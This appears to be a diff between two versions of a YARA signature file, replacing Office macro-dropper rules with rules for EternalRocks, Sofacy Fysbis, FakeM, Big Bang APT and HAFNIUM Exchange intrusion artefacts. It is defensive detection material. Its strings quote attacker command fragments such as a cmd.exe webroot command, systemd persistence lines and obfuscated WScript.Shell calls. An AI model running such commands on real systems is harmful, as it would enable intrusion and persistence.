-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1 and 1 of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Enablecontent_String_Gen : FILE
+rule SIGNATURE_BASE_SUSP_SFX_Runprogram_Wscript : FILE
 {
 	meta:
-		description = "Detects suspicious string that asks to enable active content in Office Doc"
+		description = "Detects suspicious SFX that runs wscript.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d763bc21-2925-55df-85e0-1ee857e921ca"
-		date = "2019-02-12"
+		id = "e12cea50-a939-5f69-963c-d6d1cb133e92"
+		date = "2018-09-27"
 		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L19-L40"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_sfx.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cde995ab0486fdafdc98e36c28a1f786ee7485387158f7337acd5f7dd0e3fed1"
-		score = 65
+		logic_hash = "0d00d83d4b25d80d0ca44fe1c3f3cd33ae5539d2d79c84bfdfcc470669d4f78c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
+		hash1 = "e3bb02c5985fc64759b9c2d3c5474d46237ce472b4a0101c6313dafa939de5a9"
+		hash2 = "0ecf88d4b32895b4819dec3acb62eaaa7035aa6292499d903f76af60fcec0d6a"
+		hash3 = "a7a48f5220bd1ebe04de258d71fdd001711c165d162bd45e8cfbe8964eddf01c"
+		hash4 = "b6fa4889d8a87d45706d92714d716025bf223c01929755321faac1ab0db94a88"
+		hash5 = "7117b39890659c7dd11e15092c5e5ea9495bec0ff2b6e25254f6e343ed6ca33d"
+		hash6 = "ec2afb63555986fa55b7f98ae57c57e1138acb404a0dd2fe4f3d315730b9898e"
 
 	strings:
-		$e1 = "Enable Editing" fullword ascii
-		$e2 = "Enable Content" fullword ascii
-		$e3 = "Enable editing" fullword ascii
-		$e4 = "Enable content" fullword ascii
+		$x1 = "RunProgram=\"wscript.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( $e1 in ( 0 .. 3000 ) or $e2 in ( 0 .. 3000 ) or $e3 in ( 0 .. 3000 ) or $e4 in ( 0 .. 3000 ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Worddoc_VBA_Macro_Strings : FILE
+rule SIGNATURE_BASE_Typical_Malware_String_Transforms : FILE
 {
 	meta:
-		description = "Detects suspicious strings in Word Doc that indcate malicious use of VBA macros"
+		description = "Detects typical strings in a reversed or otherwise modified form"
 		author = "Florian Roth (Nextron Systems)"
-		id = "210baf6e-ec67-5bc4-ba27-6a6de0c11a73"
-		date = "2019-02-12"
+		id = "86f348b5-0564-5d83-bbea-4f4a5f62fd30"
+		date = "2016-07-31"
 		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L42-L63"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_transformed_strings.yar#L10-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "441e4a8e90d6045d0ad6a959ce56e834960c48083343add8e4f519f4b83bc82d"
+		logic_hash = "1d3813e0d20b82ceda56d03589bb944f747dfe931396ed514fb6b36f72f98c26"
 		score = 60
-		quality = 85
-		tags = "FILE"
-		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
-
-	strings:
-		$a1 = "\\Microsoft Shared\\" ascii
-		$a2 = "\\VBA\\" ascii
-		$a3 = "Microsoft Office Word" fullword ascii
-		$a4 = "PROJECTwm" fullword wide
-		$s1 = "AppData" fullword ascii
-		$s2 = "Document_Open" fullword ascii
-		$s3 = "Project1" fullword ascii
-		$s4 = "CreateObject" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 800KB and all of them
-}
-rule SIGNATURE_BASE_SUSP_Officedoc_VBA_Base64Decode : FILE
-{
-	meta:
-		description = "Detects suspicious VBA code with Base64 decode functions"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99690116-fc89-53d7-8f29-575d75d53fc9"
-		date = "2019-06-21"
-		modified = "2023-12-05"
-		reference = "https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L65-L80"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1fb094c9991f93e9d1003832dc11a58efa8281e9fe844e61e27dfd077f55ad39"
-		score = 70
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "B64_CHAR_DICT" ascii
-		$s2 = "Base64Decode" ascii
-		$s3 = "Base64Encode" ascii
+		$e1 = "exe.tsohcvs" fullword ascii
+		$e2 = "exe.ssasl" fullword ascii
+		$e3 = "exe.rerolpxe" fullword ascii
+		$e4 = "exe.erolpxei" fullword ascii
+		$e5 = "exe.23lldnur" fullword ascii
+		$e6 = "exe.dmc" fullword ascii
+		$e7 = "exe.llikksat" fullword ascii
+		$l1 = "lld.23lenreK" fullword ascii
+		$l2 = "lld.ESABLENREK" fullword ascii
+		$l3 = "lld.esabtpyrc" fullword ascii
+		$l4 = "lld.trcvsm" fullword ascii
+		$l5 = "LLD.LLDTN" fullword ascii
+		$i1 = "paeHssecorPteG" fullword ascii
+		$i2 = "sserddAcorPteG" fullword ascii
+		$i3 = "AyrarbiLdaoL" fullword ascii
+		$i4 = "AssecorPetaerC" fullword ascii
+		$r1 = "teSlortnoCtnerruC" fullword ascii
+		$r2 = "nuR\\noisreVtnerruC" fullword ascii
+		$f1 = "\\23metsys\\" ascii
+		$f2 = "\\23metsyS\\" ascii
+		$f3 = "niB.elcyceR$" fullword ascii
+		$f4 = "%tooRmetsyS%" fullword ascii
+		$fp1 = "Application Impact Telemetry Static Analyzer" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 60KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and 1 of them and not 1 of ( $fp* ) )
 }
-rule SIGNATURE_BASE_SUSP_VBA_Filesystem_Access : FILE
+rule SIGNATURE_BASE_Eternalrocks_Taskhost : FILE
 {
 	meta:
-		description = "Detects suspicious VBA that writes to disk and is activated on document open"
+		description = "Detects EternalRocks Malware - file taskhost.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91241b91-ca3f-5817-bf78-550fe015b467"
-		date = "2019-06-21"
+		id = "8926cdf8-6a3c-5237-80f5-bda9efb39a32"
+		date = "2017-05-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L82-L100"
+		reference = "https://twitter.com/stamparm/status/864865144748298242"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_eternalrocks.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "13d7e0708968a7700308e6216ea5d0a396f9335137ae1e33c3b34a2f54012ec6"
-		score = 60
+		logic_hash = "45e5295f34280078c586c4cb643dba65aed63beffb1d6ded05de03403caf273a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30"
 
 	strings:
-		$s1 = "\\Common Files\\Microsoft Shared\\" wide
-		$s2 = "Scripting.FileSystemObject" ascii
-		$a1 = "Document_Open" ascii
-		$a2 = "WScript.Shell" ascii
-		$a3 = "AutoOpen" fullword ascii
+		$x1 = "EternalRocks.exe" fullword wide
+		$s1 = "sTargetIP" fullword ascii
+		$s2 = "SERVER_2008R2_SP0" fullword ascii
+		$s3 = "20D5CCEE9C91A1E61F72F46FA117B93FB006DB51" fullword ascii
+		$s4 = "9EBF75119B8FC7733F77B06378F9E735D34664F6" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 100KB and all of ( $s* ) and 1 of ( $a* )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_Excel_IQY_Remoteuri_Syntax : FILE
+rule SIGNATURE_BASE_Eternalrocks_Svchost : FILE
 {
 	meta:
-		description = "Detects files with Excel IQY RemoteURI syntax"
-		author = "Nick Carr"
-		id = "ea3427da-9cce-5ad9-9c78-e3cee802ba80"
-		date = "2018-08-17"
-		modified = "2023-11-25"
-		reference = "https://twitter.com/ItsReallyNick/status/1030330473954897920"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L102-L120"
+		description = "Detects EternalRocks Malware - file taskhost.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c38d3faa-06a2-5f57-a917-91974941352f"
+		date = "2017-05-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/stamparm/status/864865144748298242"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_eternalrocks.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7033b0a4226dd289ecc670a0807e4159dd4486f52bc80a6b5ddd34d6961ab163"
-		score = 55
+		logic_hash = "989df6d582949adbc4e0e2063c99d9ad83c367cedae1030dc23aade091216602"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31"
 
 	strings:
-		$URL = "http"
-		$fp1 = "https://go.microsoft.com"
+		$s1 = "WczTkaJphruMyBOQmGuNRtSNTLEs" fullword ascii
+		$s2 = "svchost.taskhost.exe" fullword ascii
+		$s3 = "ConfuserEx v" ascii
 
 	condition:
-		uint32( 0 ) == 0x0d424557 and uint32( 4 ) == 0x0a0d310a and filesize < 1MB and $URL and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them )
 }
-rule SIGNATURE_BASE_SUSP_Macro_Sheet_Obfuscated_Char : FILE
+rule SIGNATURE_BASE_Sofacy_Fybis_ELF_Backdoor_Gen1 : FILE
 {
 	meta:
-		description = "Finding hidden/very-hidden macros with many CHAR functions"
-		author = "DissectMalware"
-		id = "791e9bba-3e4e-5efd-a800-a612c6f92cfb"
-		date = "2020-04-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DissectMalware/status/1247595433305800706"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L122-L139"
+		description = "Detects Sofacy Fysbis Linux Backdoor"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6abf33e-9c5b-5e0f-b7f0-a0741bf9cc3a"
+		date = "2016-02-13"
+		modified = "2023-01-27"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_fysbis.yar#L9-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0953d1f916df570cb3d053bf4fdac196bdbd806df4b6c0a982ed9949a3676e6c"
-		score = 65
+		logic_hash = "fb5239aa75512c8c83b066e64b75469f90fb22cb0918af1e44edb29e7ab38206"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
 
 	strings:
-		$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
-		$s1 = "Excel" fullword ascii
-		$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
-		$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
-		$char_func = {06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1E 3D  00 41 6F 00}
+		$x1 = "Your command not writed to pipe" fullword ascii
+		$x2 = "Terminal don`t started for executing command" fullword ascii
+		$x3 = "Command will have end with \\n" fullword ascii
+		$s1 = "WantedBy=multi-user.target' >> /usr/lib/systemd/system/" ascii
+		$s2 = "Success execute command or long for waiting executing your command" fullword ascii
+		$s3 = "ls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"" fullword ascii
+		$s4 = "rm -f /usr/lib/systemd/system/" ascii
+		$s5 = "ExecStart=" fullword ascii
+		$s6 = "<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>" fullword ascii
 
 	condition:
-		$ole_marker at 0 and 1 of ( $macro_sheet_h* ) and #char_func > 10 and $s1
+		( uint16( 0 ) == 0x457f and filesize < 500KB and 1 of ( $x* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_LOG_F5_BIGIP_Exploitation_Artefacts_CVE_2021_22986_Mar21_1 : LOG
+rule SIGNATURE_BASE_Sofacy_Fysbis_ELF_Backdoor_Gen2 : FILE
 {
 	meta:
-		description = "Detects forensic artefacts indicating successful exploitation of F5 BIG IP appliances as reported by NCCGroup"
+		description = "Detects Sofacy Fysbis Linux Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e109ebeb-e5c3-5999-95dc-0963ed8461a6"
-		date = "2021-03-20"
+		id = "d4e3a8bb-b23a-53a4-b5fb-b321a3417b43"
+		date = "2016-02-13"
 		modified = "2023-12-05"
-		reference = "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_f5_bigip_cve_2021_22986_log.yar#L2-L15"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_fysbis.yar#L37-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "748bb429d4a086e2890773558ea502ef06f507aed5f0f70470e2cd97a3fd5007"
+		logic_hash = "1d50a789e9c43fce27f3ad390cbdd9533c61e4f263cec1aa1abfba6545e55c57"
 		score = 80
 		quality = 85
-		tags = "LOG"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+		hash3 = "fd8b2ea9a2e8a67e4cb3904b49c789d57ed9b1ce5bebfe54fe3d98214d6a0f61"
 
 	strings:
-		$x1 = "\",\"method\":\"POST\",\"uri\":\"http://localhost:8100/mgmt/tm/util/bash\",\"status\":200," ascii
-		$x2 = "[com.f5.rest.app.RestServerServlet] X-F5-Auth-Token doesn't have value, so skipping" ascii
+		$s1 = "RemoteShell" ascii
+		$s2 = "basic_string::_M_replace_dispatch" fullword ascii
+		$s3 = "HttpChannel" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x457f and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Darkeyev3_Cryptor : FILE
+rule SIGNATURE_BASE_Fakem_Generic : FILE
 {
 	meta:
-		description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
+		description = "Detects FakeM malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2b455e5-3021-5662-b593-c1aeeb34c226"
-		date = "2015-05-24"
-		modified = "2023-12-05"
-		reference = "http://darkeyev3.blogspot.fi/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_cryptors.yar#L2-L24"
+		id = "51a285ce-a4cb-5068-b079-a8227690365f"
+		date = "2016-01-25"
+		modified = "2023-01-06"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fakem_backdoor.yar#L8-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fdd3a9c22aebb40d000a642f2433adc7dd591784bdf2924edc3effce7bbfa5c2"
-		score = 55
+		logic_hash = "0ee606be48961d1e4c1fd9e0e10b53603cfd62cec652baef62f893c0a9e9684c"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash0 = "6b854b967397f7de0da2326bdd5d39e710e2bb12"
-		hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
-		hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
-		hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
-		hash4 = "a907a7b74a096f024efe57953c85464e87275ba3"
-		hash5 = "b1c422155f76f992048377ee50c79fe164b22293"
-		hash6 = "29f5322ce5e9147f09e0a86cc23a7c8dc88721b9"
-		hash7 = "a0382d7c12895489cb37efef74c5f666ea750b05"
-		hash8 = "f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61"
+		hash1 = "631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3"
+		hash2 = "3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520"
+		hash3 = "53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60"
+		hash4 = "4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3"
+		hash5 = "7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8"
+		hash6 = "12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d"
+		hash7 = "9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5"
+		hash8 = "3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90"
+		hash9 = "41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33"
+		hash10 = "53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e"
+		hash11 = "523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b"
 
 	strings:
-		$s0 = "\\DarkEYEV3-"
+		$a1 = "\\system32\\kernel32.dll" ascii
+		$a2 = "\\boot.lnk" ascii
+		$a3 = "%USERPROFILE%" fullword ascii
+		$b1 = "Wizard.EXE" fullword wide
+		$b2 = "CommandLineA" fullword ascii
+		$c1 = "\\system32\\kernel32.dll" ascii
+		$c2 = "\\aapz.tmp" ascii
+		$e1 = "C:\\Documents and Settings\\A\\" ascii
+		$e2 = "\\svchost.exe" ascii
+		$e3 = "\\Perform\\Release\\Perform.pdb" ascii
+		$f1 = "Browser.EXE" fullword wide
+		$f2 = "\\browser.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $e* ) or 1 of ( $f* ) )
 }
-
-rule SIGNATURE_BASE_APT_ME_Bigbang_Gen_Jul18_1 : FILE
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_27065
 {
 	meta:
-		description = "Detects malware from Big Bang campaign against Palestinian authorities"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-27065"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f1097998-9414-511c-b177-ff09154964a8"
-		date = "2018-07-09"
+		id = "dcc1f741-cab0-5a0b-a261-a6bd05989723"
+		date = "2021-03-02"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bigbang.yar#L3-L29"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L2-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "496994ee035aa09233c648cf4ec0d1e84ceb970917b4dc5208a1390ec6eb39c2"
+		logic_hash = "9306cf177928266ea921461e9da80ad5bb37e1e0848559898a414956cfbc2b49"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
-		hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
-		hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
+		tags = "LOG, CVE-2021-27065"
 
 	strings:
-		$x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
-		$x3 = "S%@h%@e%l%@l." ascii
-		$x4 = "(\"S@%t@%a%@rt%@up\")" ascii
-		$x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii
-		$x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii
-		$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii
-		$x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii
-		$x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii
-		$x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
+		$s1 = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of them or pe.imphash ( ) == "0f09ea2a68d04f331df9a5d0f8641332" )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_ME_Bigbang_Mal_Jul18_1 : FILE
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_26858_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_26858
 {
 	meta:
-		description = "Detects malware from Big Bang report"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-26858"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f30b2e11-f90a-5068-8eaa-25f11218ec6c"
-		date = "2018-07-09"
-		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bigbang.yar#L31-L51"
+		id = "f6fa90c7-c2c0-56db-bf7b-dc146761a995"
+		date = "2021-03-02"
+		modified = "2021-03-04"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L15-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da45482b465549fce0f088c5818dff4a734faa2e4fbcec43b750893d1c3fefad"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
-		hash2 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
+		logic_hash = "0a8296b7e990e52330412288e9ff71e08a5258fc63c4754e6d0e6d64302f55e6"
+		score = 65
+		quality = 60
+		tags = "LOG, CVE-2021-26858"
 
 	strings:
-		$s1 = "%Y%m%d-%I-%M-%S" fullword ascii
-		$s2 = "/api/serv/requests/%s/runfile/delete" fullword ascii
-		$s3 = "\\part.txt" ascii
-		$s4 = "\\ALL.txt" ascii
-		$s5 = "\\sat.txt" ascii
-		$s6 = "runfile.proccess_name" fullword ascii
-		$s7 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
+		$xr1 = /POST (\/owa\/auth\/Current\/themes\/resources\/logon\.css|\/owa\/auth\/Current\/themes\/resources\/owafont_ja\.css|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif|\/owa\/auth\/Current\/themes\/resources\/owafont_ko\.css|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiBold\.eot|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiLight\.ttf|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif)/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them
+		$xr1
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23 : FILE
+rule SIGNATURE_BASE_LOG_Exchange_Forensic_Artefacts_Cleanup_Activity_Mar21_1 : LOG
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "74c403ea-3178-58e8-88b3-a51c1d475868"
-		date = "2023-04-20"
+		description = "Detects forensic artefacts showing cleanup activity found in HAFNIUM intrusions exploiting"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95b19544-147b-5496-b717-669cbc488179"
+		date = "2021-03-08"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L2-L17"
+		reference = "https://twitter.com/jdferrell3/status/1368626281970024448"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium_log_sigs.yar#L48-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fe1a1b09344cd84f981b193b480d23807893b59ad781868d82089a7306c042f"
-		score = 85
+		logic_hash = "12e5b76dafcae13f1eb21913ae0bde233152fd8b9d29f073893418ac9f742de3"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
+		tags = "LOG"
 
 	strings:
-		$op1 = {B8 AB AA AA AA F7 E1 8B C1 C1 EA 02 8D 14 52 03 D2 2B C2 8A 84 05 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ??}
-		$op2 = { 50 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 3C 00 00 00 C7 85 ?? ?? ?? ?? 40 00 00 00 C7 85 ?? ?? ?? ?? 05 00 00 00 FF 15}
-		$op3 = { 6A 00 8D 85 ?? ?? ?? ?? 50 6A 04 8D 85 ?? ?? ?? ?? 50 57 FF 15 }
+		$x1 = "cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client" ascii wide
